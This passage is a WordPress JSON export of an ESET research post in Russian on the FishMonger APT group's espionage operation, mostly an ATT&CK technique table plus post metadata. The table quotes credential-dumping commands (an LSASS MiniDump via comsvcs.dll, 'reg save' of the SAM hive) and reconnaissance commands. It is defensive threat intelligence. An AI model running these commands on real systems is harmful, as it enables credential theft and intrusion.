\u0430\u0440\u0435\u043d\u0434\u043e\u0432\u0430\u043b \u0441\u0435\u0440\u0432\u0435\u0440\u044b \u0443 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u0445\u043e\u0441\u0442\u0438\u043d\u0433-\u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440\u043e\u0432.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1583\/001\">T1583.001<\/a><\/td>\n<td width=\"151\">\u041f\u0440\u0438\u043e\u0431\u0440\u0435\u0442\u0435\u043d\u0438\u0435 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b: \u0414\u043e\u043c\u0435\u043d\u044b<\/td>\n<td width=\"265\">FishMonger \u043f\u043e\u043a\u0443\u043f\u0430\u043b \u0434\u043e\u043c\u0435\u043d\u044b \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b \u0438\u0445 \u0434\u043b\u044f \u0442\u0440\u0430\u0444\u0438\u043a\u0430 C&amp;C.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"3\" width=\"113\"><strong>\u0412\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1059\/001\">T1059.001<\/a><\/td>\n<td width=\"151\">\u0418\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441 \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u0438: PowerShell<\/td>\n<td width=\"265\">FishMonger \u0437\u0430\u0433\u0440\u0443\u0437\u0438\u043b ShadowPad \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e PowerShell.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1059\/003\">T1059.003<\/a><\/td>\n<td width=\"151\">\u0418\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441 \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u0438: \u041a\u043e\u043c\u0430\u043d\u0434\u043d\u0430\u044f \u0441\u0442\u0440\u043e\u043a\u0430 Windows<\/td>\n<td width=\"265\">FishMonger \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u043b Spyder \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e BAT-\u0441\u043a\u0440\u0438\u043f\u0442\u0430.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1072\">T1072<\/a><\/td>\n<td width=\"151\">\u0418\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f \u041f\u041e<\/td>\n<td width=\"265\">FishMonger \u043f\u043e\u043b\u0443\u0447\u0438\u043b \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u043a\u043e\u043d\u0441\u043e\u043b\u0438 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0435\u0435 \u0434\u043b\u044f \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u043a\u043e\u043c\u0430\u043d\u0434 \u043d\u0430 \u0434\u0440\u0443\u0433\u0438\u0445 \u043c\u0430\u0448\u0438\u043d\u0430\u0445 \u0432 \u0441\u0435\u0442\u0438 \u0436\u0435\u0440\u0442\u0432\u044b.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><strong>\u041f\u043e\u0441\u0442\u043e\u044f\u043d\u0441\u0442\u0432\u043e<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1543\/003\">T1543.003<\/a><\/td>\n<td width=\"151\">\u0421\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u0438\u043b\u0438 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430: \u0421\u043b\u0443\u0436\u0431\u0430 Windows<\/td>\n<td width=\"265\">\u041d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a\u0438 SodaMaster \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u044e\u0442\u0441\u044f \u0447\u0435\u0440\u0435\u0437 \u0441\u043b\u0443\u0436\u0431\u0443 Windows.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"2\" width=\"113\"><strong>\u041e\u0431\u0445\u043e\u0434 \u0437\u0430\u0449\u0438\u0442\u044b<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1574\/002\">T1574.002<\/a><\/td>\n<td width=\"151\">\u041f\u0435\u0440\u0435\u0445\u0432\u0430\u0442 \u043f\u043e\u0442\u043e\u043a\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f: \u041f\u043e\u0431\u043e\u0447\u043d\u0430\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0430 DLL<\/td>\n<td width=\"265\">ShadowPad \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442\u0441\u044f DLL-\u0444\u0430\u0439\u043b\u043e\u043c \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c <span>log.dll<\/span>, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0431\u043e\u0447\u043d\u043e \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442\u0441\u044f \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u043c \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u043c \u0444\u0430\u0439\u043b\u043e\u043c Bitdefender.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1140\">T1140<\/a><\/td>\n<td width=\"151\">\u0414\u0435\u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u044f\/\u0434\u0435\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0444\u0430\u0439\u043b\u043e\u0432 \u0438\u043b\u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438<\/td>\n<td width=\"265\">ShadowPad, Spyder \u0438 SodaMaster \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u044b\u0432\u0430\u044e\u0442\u0441\u044f \u0438 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u044e\u0442\u0441\u044f \u0432 \u043f\u0430\u043c\u044f\u0442\u044c.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"4\" width=\"113\"><strong>\u0414\u043e\u0441\u0442\u0443\u043f \u043a \u0443\u0447\u0435\u0442\u043d\u044b\u043c \u0434\u0430\u043d\u043d\u044b\u043c<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1555\/003\">T1555.003<\/a><\/td>\n<td width=\"151\">\u0423\u0447\u0435\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0438\u0437 \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449 \u043f\u0430\u0440\u043e\u043b\u0435\u0439: \u0423\u0447\u0435\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0438\u0437 \u0432\u0435\u0431-\u0431\u0440\u0430\u0443\u0437\u0435\u0440\u043e\u0432<\/td>\n<td width=\"265\">\u041d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a\u0438 SodaMaster \u043c\u043e\u0433\u0443\u0442 \u0438\u0437\u0432\u043b\u0435\u043a\u0430\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u0438 \u0438\u0437 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 Firefox.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1556\/002\">T1556.002<\/a><\/td>\n<td width=\"151\">\u0418\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438: DLL-\u0444\u0438\u043b\u044c\u0442\u0440 \u043f\u0430\u0440\u043e\u043b\u0435\u0439<\/td>\n<td width=\"265\">FishMonger \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0439 DLL-\u0444\u0438\u043b\u044c\u0442\u0440 \u043f\u0430\u0440\u043e\u043b\u0435\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u0438 \u043d\u0430 \u0434\u0438\u0441\u043a \u0438\u043b\u0438 \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u043e\u0432\u0430\u0442\u044c \u0438\u0445 \u043d\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1003\/001\">T1003.001<\/a><\/td>\n<td width=\"151\">\u0414\u0430\u043c\u043f \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u041e\u0421: \u041f\u0430\u043c\u044f\u0442\u044c LSASS<\/td>\n<td width=\"265\">FishMonger \u0434\u0430\u043c\u043f\u043d\u0443\u043b \u043f\u0430\u043c\u044f\u0442\u044c LSASS, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f <span>rundll32 C:windowssystem32comsvcs.dll, MiniDump<\/span>.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1003\/002\">T1003.002<\/a><\/td>\n<td width=\"151\">\u0414\u0430\u043c\u043f \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u041e\u0421: \u041c\u0435\u043d\u0435\u0434\u0436\u0435\u0440 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u043e\u0432<\/td>\n<td width=\"265\">FishMonger \u0434\u0430\u043c\u043f\u043d\u0443\u043b \u043c\u0435\u043d\u0435\u0434\u0436\u0435\u0440 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u043e\u0432, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f <span>reg save hklmsam C:userspublicmusicsam.hive<\/span>.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"4\" width=\"113\"><strong>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1087\/001\">T1087.001<\/a><\/td>\n<td width=\"151\">\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439: \u041b\u043e\u043a\u0430\u043b\u044c\u043d\u0430\u044f \u0443\u0447\u0435\u0442\u043d\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c<\/td>\n<td width=\"265\">FishMonger \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u043b \u043a\u043e\u043c\u0430\u043d\u0434\u0443 <span>net user<\/span>.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1016\">T1016<\/a><\/td>\n<td width=\"151\">\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0441\u0438\u0441\u0442\u0435\u043c\u044b<\/td>\n<td width=\"265\">FishMonger \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u043b \u043a\u043e\u043c\u0430\u043d\u0434\u0443 <span>ipconfig \/all<\/span>.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1007\">T1007<\/a><\/td>\n<td width=\"151\">\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0445 \u0441\u043b\u0443\u0436\u0431<\/td>\n<td width=\"265\">FishMonger \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u043b \u043a\u043e\u043c\u0430\u043d\u0434\u0443 <span>tasklist \/svc<\/span>.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1057\">T1057<\/a><\/td>\n<td width=\"151\">\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432<\/td>\n<td width=\"265\">FishMonger \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u043b \u043a\u043e\u043c\u0430\u043d\u0434\u0443 <span>tasklist \/v<\/span>.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><strong>\u0411\u043e\u043a\u043e\u0432\u043e\u0435 \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u0435<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1021\/002\">T1021.002<\/a><\/td>\n<td width=\"151\">\u0423\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0435 \u0441\u043b\u0443\u0436\u0431\u044b: SMB\/\u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u0448\u0430\u0440\u044b Windows<\/td>\n<td width=\"265\">FishMonger \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b Impacket \u0434\u043b\u044f \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u043d\u0430 \u0434\u0440\u0443\u0433\u0438\u0445 \u043c\u0430\u0448\u0438\u043d\u0430\u0445 \u0432 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0435\u0442\u0438.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><strong>\u041a\u043e\u043c\u0430\u043d\u0434\u043d\u043e\u0435 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1095\">T1095<\/a><\/td>\n<td width=\"151\">\u041f\u0440\u043e\u0442\u043e\u043a\u043e\u043b \u043d\u0435 \u043f\u0440\u0438\u043a\u043b\u0430\u0434\u043d\u043e\u0433\u043e \u0443\u0440\u043e\u0432\u043d\u044f<\/td>\n<td width=\"265\">ShadowPad \u043e\u0431\u043c\u0435\u043d\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u0434\u0430\u043d\u043d\u044b\u043c\u0438 \u0447\u0435\u0440\u0435\u0437 \u043d\u0435\u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0430\u043d\u043d\u044b\u0435 TCP \u0438 UDP.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><a href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=operation-fishmedley&amp;sfdccampaignid=7011n0000017htTAAQ\"><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"296\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-12\/welivesecurity-eset-threat-intelligence.jpeg\" width=\"915\"><\/a><\/p>\n<p class=\"wls-source\"><a href=\"https:\/\/www.welivesecurity.com\/en\/eset-research\/operation-fishmedley\/\" rel=\"nofollow noopener\" target=\"_blank\">\u0427\u0438\u0442\u0430\u0442\u044c \u043f\u043e\u043b\u043d\u044b\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u043d\u0430 WeLiveSecurity \u2192<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>ESET researchers detail a global espionage operation by FishMonger, the APT group run by I\u2011SOON<\/p>\n","protected":false},"author":5,"featured_media":8734,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[2891],"tags":[],"class_list":["post-8736","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-issledovaniya-eset"],"acf":[],"amp_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/posts\/8736","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/comments?post=8736"}],"version-history":[{"count":1,"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/posts\/8736\/revisions"}],"predecessor-version":[{"id":9420,"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/posts\/8736\/revisions\/9420"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/media\/8734"}],"wp:attachment":[{"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/media?parent=8736"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/categories?post=8736"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/tags?post=8736"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}